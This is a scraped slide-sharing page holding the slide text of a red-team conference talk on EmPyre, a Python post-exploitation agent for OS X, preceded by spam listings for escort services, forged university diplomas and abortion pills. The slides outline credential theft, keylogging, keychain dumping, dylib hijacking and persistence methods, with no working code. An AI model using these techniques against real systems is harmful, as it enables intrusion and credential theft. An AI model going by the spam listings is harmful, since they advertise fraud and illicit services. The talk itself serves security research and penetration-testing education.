APNIC Updates presented by Paul Wilson at  CaribNOG 27APNIC Updates presented by Paul Wilson at  CaribNOG 27
APNIC Updates presented by Paul Wilson at CaribNOG 27
 
VIP ℂall Girls Bangalore 8250077686 WhatsApp: Me All Time Serviℂe Available D...
VIP ℂall Girls Bangalore 8250077686 WhatsApp: Me All Time Serviℂe Available D...VIP ℂall Girls Bangalore 8250077686 WhatsApp: Me All Time Serviℂe Available D...
VIP ℂall Girls Bangalore 8250077686 WhatsApp: Me All Time Serviℂe Available D...
 
原版定制英国赫瑞瓦特大学毕业证原件一模一样
原版定制英国赫瑞瓦特大学毕业证原件一模一样原版定制英国赫瑞瓦特大学毕业证原件一模一样
原版定制英国赫瑞瓦特大学毕业证原件一模一样
 
一比一原版(TRU毕业证书)温哥华社区学院毕业证如何办理
一比一原版(TRU毕业证书)温哥华社区学院毕业证如何办理一比一原版(TRU毕业证书)温哥华社区学院毕业证如何办理
一比一原版(TRU毕业证书)温哥华社区学院毕业证如何办理
 
Thank You Luv I’ll Never Walk Alone Again T shirts
Thank You Luv I’ll Never Walk Alone Again T shirtsThank You Luv I’ll Never Walk Alone Again T shirts
Thank You Luv I’ll Never Walk Alone Again T shirts
 
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
 
原版定制(Glasgow毕业证书)英国格拉斯哥大学毕业证原件一模一样
原版定制(Glasgow毕业证书)英国格拉斯哥大学毕业证原件一模一样原版定制(Glasgow毕业证书)英国格拉斯哥大学毕业证原件一模一样
原版定制(Glasgow毕业证书)英国格拉斯哥大学毕业证原件一模一样
 
一比一定制(USC毕业证书)美国南加州大学毕业证学位证书
一比一定制(USC毕业证书)美国南加州大学毕业证学位证书一比一定制(USC毕业证书)美国南加州大学毕业证学位证书
一比一定制(USC毕业证书)美国南加州大学毕业证学位证书
 
一比一原版英国创意艺术大学毕业证如何办理
一比一原版英国创意艺术大学毕业证如何办理一比一原版英国创意艺术大学毕业证如何办理
一比一原版英国创意艺术大学毕业证如何办理
 
如何办理(UCLA毕业证)加州大学洛杉矶分校毕业证成绩单本科硕士学位证留信学历认证
如何办理(UCLA毕业证)加州大学洛杉矶分校毕业证成绩单本科硕士学位证留信学历认证如何办理(UCLA毕业证)加州大学洛杉矶分校毕业证成绩单本科硕士学位证留信学历认证
如何办理(UCLA毕业证)加州大学洛杉矶分校毕业证成绩单本科硕士学位证留信学历认证
 
GOOGLE Io 2024 At takes center stage.pdf
GOOGLE Io 2024 At takes center stage.pdfGOOGLE Io 2024 At takes center stage.pdf
GOOGLE Io 2024 At takes center stage.pdf
 
I’ll See Y’All Motherfuckers In Game 7 Shirt
I’ll See Y’All Motherfuckers In Game 7 ShirtI’ll See Y’All Motherfuckers In Game 7 Shirt
I’ll See Y’All Motherfuckers In Game 7 Shirt
 
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...
 
原版定制美国加州大学河滨分校毕业证原件一模一样
原版定制美国加州大学河滨分校毕业证原件一模一样原版定制美国加州大学河滨分校毕业证原件一模一样
原版定制美国加州大学河滨分校毕业证原件一模一样
 
The Rise of Subscription-Based Digital Services.pdf
The Rise of Subscription-Based Digital Services.pdfThe Rise of Subscription-Based Digital Services.pdf
The Rise of Subscription-Based Digital Services.pdf
 

Building an EmPyre with Python

  • 2. @harmj0y × Researcher/red teamer for the Adaptive Threat Division × Co-founder/active developer of the Veil-Framework | PowerView | PowerUp | Empire × Microsoft CDM/PowerShell MVP and active PowerSploit developer
  • 3. @424f424f × U.S. Army Infrantry combat veteran × Red teamer/Penetration Tester for the Adaptive Threat Division × Instructor for ATD’s “Adaptive Penetration Testing” course
  • 4. @killswitch_gui × Previous US Army Soldier × Red teamer/Penetration Tester for the Adaptive Threat Division × Developed SimplyEmail / SimplyTemplate
  • 5. tl;dr × Overview/”Why Build This”/RATs 101 × EmPyre × Stagers × Host/network triage × Lateral movement × Persistence × The Future × Demos throughout!
  • 7. Motivations × A high-security client wanted a penetration test against their corporate infrastructure × which was 80% OS X … × We did our research and found very few options for ‘complete’ OS X agents × though small post-exploitation pieces did exist
  • 8. Adversarial OS X × WireLurker (Trojanized applications, Infects connected ios devices) × XcodeGhost (Infected xcode package in China) × Hacking Team (Remote Code Systems compromise platform) × OceanLotus (Flash Dropper, download Mach-O binary) × KeRanger (Ransomware, infected transmission package)
  • 9. OS X Challenges × Not nearly as many public OS X attack toolsets out there as there are for Windows × Access vectors are significantly more limited than Windows as well × Lateral spread is complicated a bit (no pth!)
  • 10. RATS 101 × We have a number of broad design goals for our solution: × Staging flexibility × Modularity × (Reasonably) strong crypto × The “Staging problem” × Your malicious code has to SOMEHOW get to the target
  • 12.
  • 13. background × Python agent and controller × heavily based on the PowerShell Empire project × OS X/Linux 2.7 and 2.6 compatible/“living off the land” × Asynchronous communications (HTTP[s]) × Diffie-Hellman based Encrypted Key Exchange × Variety of post-exploitation modules
  • 14. Module development × Like Empire, development is quick due to the modular structure and use of a scripting language × Modules == metadata containers for an embedded Python script × Things like option sets, needs admin, opsec safe, save file output, etc
  • 16. OS X MAcros × Works on Office 2011 and below, otherwise, we’re stuck in the...
  • 17.
  • 18. Mach-o binaries × Mach object file format for executables, object code, shared libraries, dynamically-loaded code and core dumps × We hot-patch a binary with the EmPyre stager code × Binary contains the python interpreter
  • 19. Dylib Hijacking × Ported from @patrickwardle research × https://www.virusbulletin.com/uploads/pdf/magazin e/2015/vb201503-dylib-hijacking.pdf × Abuses search-order loading × Also a method of persistence in EmPyre
  • 24. Privilege escalation × Users often run as admin × Two prompt modules for credential collection: × Mac app prompting - osascript × Screensaver alleyoop - osascript / security × Elevate using sudo_spawn to spawn a new EmPyre agent
  • 26. Chainbreaker × Keychaindump (juuso) × Keychain exploitable prior to OS X yosemite to recover master key from memory × Decrypt keychain store using master key candidate × Keychaindump_chainbreaker (n0fate) × Allows masterkey and password input for decryption of entire keychain. × Fully ported to allow on target dumps rather offline
  • 27. Hashdumping × Built in hashdump module: × Sudo required of course × Output is hashcat ready × Hash format is unique to different OS X series × 10.8 + uses Salted-SHA512-PBKDF2 × Password -> Iterations -> salt -> hash_pbkd2 × Ultimately very slow hash to crack (H/S)
  • 29. Keylogging × Uses ruby adapted code from MSF: × Captures and logs keystrokes to a file currently × Runs as a separate ruby process
  • 30. screenshots × Currently supports two separate methods: × Native - screenshot builtin tool × Python - using Quartz API call’s × Environment can dictate the use of native tools × CGImageDestinationCreateWithUR() and screenshot only allows a output path for image
  • 31. Clipboard theft × Great way to target and collect credentials × Output to file or pipeline: × Timed collection allows continues monitoring using background jobs × Uses non-native method via AppKit API: × Native pbpaste may be signatured by Carbon Black
  • 32.
  • 33. Demo: Host Triage with EmPyre
  • 35. OS X is on the Domain Too! × Admins want/need to: × Enforce corporate policy via Group Policy × Manage resources × Manage users × Advertise resources such as printers × Benefit from single sign-on access to Active Directory resources through Kerberos
  • 36.
  • 37. OS X and LDAP × ldapsearch tool × opens a connection to an LDAP server, binds, and performs a search using specified parameters × dig -t SRV _ldap._tcp.example.com
  • 38. PowerView, OS X Style × Wanted to mimic the features of PowerSploit’s PowerView to enumerate Active Directory × Using ldapsearch, we can mimic “most” features × Unfortunately, creates a log entry for every connection
  • 39. Situational Awareness, AD Enumeration × get_computers × get_domaincontrollers × get_fileservers × get_groupmembers × get_groupmemberships × get_groups × get_ous × get_userinformation × get_users
  • 41. Overpass-THE-HASH × Original research by @gentilkiwi and @obscuresec and OS X research by @passingthehash × Upgrading an NT hash into a full Kerberos ticket! × Utilities × kinit - acquire initial Kerberos credentials × klist - list Kerberos credentials × kdestroy - remove Kerberos credentials
  • 42.
  • 45. Os x vs windows × Common Windows lateral movement methods: × WMI, PSEXEC, WinRM, Remote Desktop × OS X disappoints a bit on this front... × SSH is available but disabled by default × WinEXE installed through HomeBrew are possible × EmPyre modules: × ssh_command / ssh_launcher
  • 46. Web Service Exploitation × JBoss exploit × Pass exploit to Empire server
  • 47.
  • 49. Os x vs windows × Common Windows persistence methods: × Registry keys × Startup folders × WMI × DLL hijacks × Backdoor accounts × OS X is also quite fruitful: × Crontabs × Loginhooks × Daemons × Dylib Hijacking
  • 50. Crontabs, Daemons, and Login Hooks × Login Hook - User Context × Bash / Applescript / binary execution × User or any user logon executes payload × Sets com.apple.loginwindow × Crontabs - User Context × Requires Bash / Applescript / binary × Timed execution of payload × Great for continued access × Launch Daemons - Root Context × Requires sudo × Spawns determined by XML manifest (reboot) × Daemons (services) once started will restart upon agent loss
  • 51. Persistence with Dylib Hijacking × EmPyre implements @patrickwardle research to scan for hijackable Dylibs! × rPath search, WeakLib import search × CreateHijacker module × allows for quick exploitation × ease of generating payload × patching in the path to the legitimate Dylib for proper execution
  • 52. Questions? @harmj0y / will [at] harmj0y.net @424f424f / steveborosh [at] gmail.com @killswitch_gui / a.rymdekoharvey [at] gmail.com